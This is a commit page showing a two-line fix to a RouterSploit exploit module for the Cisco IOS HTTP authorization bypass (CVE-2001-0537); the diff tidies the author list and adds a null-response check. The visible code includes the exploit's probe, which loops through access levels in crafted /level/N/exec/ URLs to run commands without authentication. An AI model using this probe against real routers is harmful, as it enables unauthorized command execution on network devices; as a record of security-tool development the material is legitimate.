Cisco IOS HTTP Auth Bypass exploit little fixes

772cc62a · lucyoa · db81c414 · 772cc62a
Commit 772cc62a authored Apr 18, 2017 by lucyoa
Hide whitespace changes
Inline Side-by-side

Showing with 2 additions and 2 deletions

ios_http_authorization_bypass.py ...t/modules/exploits/cisco/ios_http_authorization_bypass.py +2 -2

No files found.
--- a/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
+++ b/routersploit/modules/exploits/cisco/cisco_ios_http_authorization_bypass.py
@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
                       'to bypass authentication and execute arbitrary commands, '
                       'when local authorization is being used, by specifying a high access level in the URL.',
        'authors': [
-            'Author', 'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
+            'renos stoikos <rstoikos[at]gmail.com>'  # routesploit module
        ],
        'references': [
            'http://www.cvedetails.com/cve/cve-2001-0537',
@@ -44,7 +44,7 @@ class Exploit(exploits.Exploit):
        for num in range(16, 100):
            url = "{}:{}/level/{}/exec/-/{}".format(self.target, self.port, num, self.show_command)
            response = http_request(method="GET", url=url)
-            if response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
+            if response is not None and response.status_code == 200 and "Command was:  {}".format(self.show_command) in response.text:
                self.access_level = num
                return True  # target is vulnerable
        return False  # target is not vulnerable